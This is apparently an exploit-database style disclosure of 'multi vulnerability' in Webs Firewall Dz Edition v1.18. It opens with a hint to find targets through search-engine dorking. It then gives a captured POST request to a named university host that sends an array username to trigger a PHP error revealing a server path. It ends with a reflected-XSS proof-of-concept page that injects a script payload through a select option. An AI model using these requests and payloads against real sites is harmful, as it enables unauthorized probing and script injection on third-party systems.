====================================================================================================================================
| # Title : Webs Firewall Dz Edition v1.18 Multi vulnerability |
| # Telegram : @indoushka |
| # Tested on : windows 10 Français V.(Pro) |
| # Version : 1.18 |
| # Vendor : http://www.ithrytec.com/ |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine
Application error message :
Request
POST /webs/index HTTP/1.1
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Referer: http://imaa-univ.com/webs/
Cookie: PHPSESSID=42b374f6e8a331cad18647dd127167b0
Host: imaa-univ.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
signin=&password=g00dPa%24%24w0rD&username[]=nxseqxeaResponse
HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 06 Mar 2018 17:49:59 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Original-Content-Encoding: gzip
Content-Length: 2661
Vulnerability description :
This page contains an error/warning message that may disclose sensitive information.
The message can also contain the location of the file that produced the unhandled exception.
This may be a false positive if the error message is found in documentation pages.
This vulnerability affects /webs/index.
Attack details :
URL encoded POST input username was set to nxseqxea
Error message found :
<b>Warning</b>: mysqli_real_escape_string() expects parameter 2 to be string, array given in <b>/home/imaauniv/public_html/webs/index.php</b> on line <b>106</b><br />
XSS Reflected - jQuery JavaScript Library v2.2.4 :
<html>
<head>
<meta charset="utf-8">
<title>XSS Reflected - jQuery JavaScript Library v2.2.4 </title>
<script src="http://imaa-univ.com/webs/assets/js/jquery-2.2.4.min.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>
<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="xssreflected"><script><marquee><font color=lime size=32>indoushka</font></marquee>;</script>;</script></option>
</select>
</p>
</form>
</body>
</html>
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | |
|
=======================================================================================================================================